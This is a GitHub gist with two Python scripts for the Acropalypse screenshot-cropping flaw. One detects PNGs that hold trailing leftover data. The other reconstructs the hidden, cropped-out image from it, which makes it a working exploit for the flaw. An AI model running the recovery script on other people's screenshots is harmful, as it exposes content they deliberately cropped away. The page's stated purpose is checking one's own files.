Forked from DavidBuchanan314/acropalypse_matching_sha256.py
Last active
April 16, 2023 09:58
-
-
Save samicrusader/e4ea3d5d0a7fc44878d27fbc554a4bb5 to your computer and use it in GitHub Desktop.
check if a folder of screenshots got wikileaked by Android 10's undocumented API bullshit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zlib | |
import os | |
import sys | |
import io | |
# Bail out early when the caller did not supply width, height and a directory.
if len(sys.argv) != 4:
    # usage text belongs on stderr, and a usage error should exit nonzero
    print(f"USAGE: {sys.argv[0]} phone_width phone_height wikileaks/", file=sys.stderr)
    sys.exit(1)
print('this tool gonna take a bit depending on how big and girthy your screenshots( folder) is')
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # standard 8-byte PNG file signature
def parse_png_chunk(stream):
    """Read one PNG chunk from *stream* and return ``(type, body)``.

    Chunk layout is: 4-byte big-endian length, 4-byte type, payload,
    4-byte big-endian CRC-32 over type + payload.

    Raises:
        ValueError: if the stored CRC does not match the data.
            (Was an ``assert``, which silently disappears under ``python -O``.)
    """
    size = int.from_bytes(stream.read(4), "big")
    ctype = stream.read(4)
    body = stream.read(size)
    csum = int.from_bytes(stream.read(4), "big")
    if zlib.crc32(ctype + body) != csum:
        raise ValueError(f"bad CRC for chunk {ctype!r}")
    return ctype, body
def pack_png_chunk(stream, name, body):
    """Serialize one PNG chunk (length, type, payload, CRC-32) to *stream*."""
    checksum = zlib.crc32(body, zlib.crc32(name))
    stream.write(b"".join([
        len(body).to_bytes(4, "big"),
        name,
        body,
        checksum.to_bytes(4, "big"),
    ]))
# Scan every file in the target directory for Acropalypse-style trailing data
# (data left behind after the cropped image's IEND chunk).
for item in os.listdir(sys.argv[3]):
    orig_width = int(sys.argv[1])
    orig_height = int(sys.argv[2])
    wikileaked = False
    path = os.path.join(sys.argv[3], item)
    with open(path, "rb") as f_in:  # context manager: no leaked handle per file
        magic = f_in.read(len(PNG_MAGIC))
        if magic != PNG_MAGIC:
            # not a PNG at all -- skip (was a bare except around an assert,
            # which also swallowed KeyboardInterrupt etc.)
            continue
        # find end of cropped PNG
        try:
            while True:
                ctype, body = parse_png_chunk(f_in)
                if ctype == b"IEND":
                    break
        except (AssertionError, ValueError):
            # truncated/corrupt chunk stream: skip it, don't kill the whole scan
            continue
        # grab the trailing data
        trailer = f_in.read()
    # find the start of the next IDAT chunk
    try:
        next_idat = trailer.index(b"IDAT", 12)
    except ValueError:
        continue  # no trailing IDAT -> this file was not affected
    wikileaked = True
    # skip first 12 bytes in case they were part of a chunk boundary
    idat = trailer[12:next_idat - 8]  # last 8 bytes are crc32, next chunk len
    stream = io.BytesIO(trailer[next_idat - 4:])
    while True:
        try:
            ctype, body = parse_png_chunk(stream)
        except (AssertionError, ValueError):
            break  # corrupt trailing chunk: work with what we already collected
        if ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        else:
            break
    idat = idat[:-4]  # slice off the adler32
    # explode the deflate stream into individual bits (LSB first, per RFC 1951)
    bitstream = []
    for byte in idat:
        for bit in range(8):
            bitstream.append((byte >> bit) & 1)
    # add some padding so we don't lose any bits
    for _ in range(7):
        bitstream.append(0)
    # re-pack the bits at each of the 8 possible sub-byte offsets
    byte_offsets = []
    for i in range(8):
        shifted_bytestream = []
        for j in range(i, len(bitstream) - 7, 8):
            val = 0
            for k in range(8):
                val |= bitstream[j + k] << k
            shifted_bytestream.append(val)
        byte_offsets.append(bytes(shifted_bytestream))
    # bit wrangling sanity checks
    assert byte_offsets[0] == idat
    assert byte_offsets[1] != idat
    # prefix the stream with 32k of "X" so backrefs can work
    prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000
    for i in range(len(idat)):
        truncated = byte_offsets[i % 8][i // 8:]
        # only bother looking if it's (maybe) the start of a non-final
        # dynamic-huffman coded block (BFINAL=0, BTYPE=10 -> low bits 0b100)
        if truncated[0] & 7 != 0b100:
            continue
        d = zlib.decompressobj(wbits=-15)
        try:
            decompressed = d.decompress(prefix + truncated) + d.flush(zlib.Z_FINISH)
            decompressed = decompressed[0x8000:]  # remove leading padding
            if d.eof and d.unused_data in [b"", b"\x00"]:  # there might be a null byte if we added too many padding bits
                # XXX: maybe there could be false positives and we should keep looking?
                break
        except zlib.error:  # this will happen almost every time
            pass
    if wikileaked:
        print('wikileaked:', os.path.join(sys.argv[3], item))
print('alright bro if u got wikileaked you should check if those screenshots u sent anywhere b4 you get doxed ππππππ')
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# THIS VERSION DUMPS THE LEAKED IMAGE | |
import zlib | |
import os | |
import sys | |
import io | |
# Bail out early when the caller did not supply width, height and a directory.
if len(sys.argv) != 4:
    # usage text belongs on stderr, and a usage error should exit nonzero
    print(f"USAGE: {sys.argv[0]} phone_width phone_height wikileaks/", file=sys.stderr)
    sys.exit(1)
print('this tool gonna take a bit depending on how big and girthy your screenshots( folder) is')
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # standard 8-byte PNG file signature
def parse_png_chunk(stream):
    """Read one PNG chunk from *stream*; return ``(type, payload)``.

    Layout: 4-byte big-endian length, 4-byte type, payload, 4-byte
    big-endian CRC-32 over type + payload. Raises AssertionError when
    the stored CRC does not match the data.
    """
    length = int.from_bytes(stream.read(4), "big")
    chunk_type = stream.read(4)
    payload = stream.read(length)
    expected_crc = int.from_bytes(stream.read(4), "big")
    assert zlib.crc32(chunk_type + payload) == expected_crc
    return chunk_type, payload
def pack_png_chunk(stream, name, body):
    """Write one PNG chunk: 4-byte length, type, payload, CRC-32 of type+payload."""
    crc = zlib.crc32(body, zlib.crc32(name))
    for piece in (len(body).to_bytes(4, "big"), name, body, crc.to_bytes(4, "big")):
        stream.write(piece)
# Scan every file in the target directory; when trailing data is found,
# also reconstruct and dump the recoverable image next to the original.
for item in os.listdir(sys.argv[3]):
    orig_width = int(sys.argv[1])
    orig_height = int(sys.argv[2])
    wikileaked = False
    path = os.path.join(sys.argv[3], item)
    with open(path, "rb") as f_in:  # context manager: no leaked handle per file
        magic = f_in.read(len(PNG_MAGIC))
        if magic != PNG_MAGIC:
            # not a PNG at all -- skip (was a bare except around an assert,
            # which also swallowed KeyboardInterrupt etc.)
            continue
        # find end of cropped PNG
        try:
            while True:
                ctype, body = parse_png_chunk(f_in)
                if ctype == b"IEND":
                    break
        except (AssertionError, ValueError):
            # truncated/corrupt chunk stream: skip it, don't kill the whole scan
            continue
        # grab the trailing data
        trailer = f_in.read()
    # find the start of the next IDAT chunk
    try:
        next_idat = trailer.index(b"IDAT", 12)
    except ValueError:
        continue  # no trailing IDAT -> this file was not affected
    wikileaked = True
    # skip first 12 bytes in case they were part of a chunk boundary
    idat = trailer[12:next_idat - 8]  # last 8 bytes are crc32, next chunk len
    stream = io.BytesIO(trailer[next_idat - 4:])
    while True:
        try:
            ctype, body = parse_png_chunk(stream)
        except (AssertionError, ValueError):
            break  # corrupt trailing chunk: work with what we already collected
        if ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        else:
            break
    idat = idat[:-4]  # slice off the adler32
    # explode the deflate stream into individual bits (LSB first, per RFC 1951)
    bitstream = []
    for byte in idat:
        for bit in range(8):
            bitstream.append((byte >> bit) & 1)
    # add some padding so we don't lose any bits
    for _ in range(7):
        bitstream.append(0)
    # re-pack the bits at each of the 8 possible sub-byte offsets
    byte_offsets = []
    for i in range(8):
        shifted_bytestream = []
        for j in range(i, len(bitstream) - 7, 8):
            val = 0
            for k in range(8):
                val |= bitstream[j + k] << k
            shifted_bytestream.append(val)
        byte_offsets.append(bytes(shifted_bytestream))
    # bit wrangling sanity checks
    assert byte_offsets[0] == idat
    assert byte_offsets[1] != idat
    # prefix the stream with 32k of "X" so backrefs can work
    prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000
    # BUGFIX: `decompressed` was previously unbound when no candidate offset
    # decompressed cleanly, crashing with NameError during reconstruction.
    decompressed = b""
    for i in range(len(idat)):
        truncated = byte_offsets[i % 8][i // 8:]
        # only bother looking if it's (maybe) the start of a non-final
        # dynamic-huffman coded block (BFINAL=0, BTYPE=10 -> low bits 0b100)
        if truncated[0] & 7 != 0b100:
            continue
        d = zlib.decompressobj(wbits=-15)
        try:
            decompressed = d.decompress(prefix + truncated) + d.flush(zlib.Z_FINISH)
            decompressed = decompressed[0x8000:]  # remove leading padding
            if d.eof and d.unused_data in [b"", b"\x00"]:  # there might be a null byte if we added too many padding bits
                # XXX: maybe there could be false positives and we should keep looking?
                break
        except zlib.error:  # this will happen almost every time
            pass
    if wikileaked:
        with open(os.path.join(sys.argv[3], item + '_wikileaked.png'), "wb") as out:
            out.write(PNG_MAGIC)
            # minimal IHDR describing the original (pre-crop) dimensions
            ihdr = b""
            ihdr += orig_width.to_bytes(4, "big")
            ihdr += orig_height.to_bytes(4, "big")
            ihdr += (8).to_bytes(1, "big")  # bitdepth
            ihdr += (2).to_bytes(1, "big")  # true colour
            ihdr += (0).to_bytes(1, "big")  # compression method
            ihdr += (0).to_bytes(1, "big")  # filter method
            ihdr += (0).to_bytes(1, "big")  # interlace method
            pack_png_chunk(out, b"IHDR", ihdr)
            # fill missing data with solid magenta
            reconstructed_idat = bytearray((b"\x00" + b"\xff\x00\xff" * orig_width) * orig_height)
            # paste in the data we decompressed
            # (guard required: with empty data, [-0:] is [0:] and the
            # assignment would wipe the entire magenta buffer)
            if decompressed:
                reconstructed_idat[-len(decompressed):] = decompressed
            # one last thing: any bytes defining filter mode may
            # have been replaced with a backref to our "X" padding
            # we should find those and replace them with a valid filter mode (0)
            for i in range(0, len(reconstructed_idat), orig_width * 3 + 1):
                if reconstructed_idat[i] == ord("X"):
                    reconstructed_idat[i] = 0
            pack_png_chunk(out, b"IDAT", zlib.compress(reconstructed_idat))
            pack_png_chunk(out, b"IEND", b"")
        print('wikileaked:', os.path.join(sys.argv[3], item))
print('alright bro if u got wikileaked you should check if those screenshots u sent anywhere b4 you get doxed ππππππ')
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
if some photos won't open (try using feh), you can run them through https://github.com/sherlly/PCRT/blob/6c7b909af96e1cf87299986e7b1136f5c81c80e8/PCRT.py and it might fix them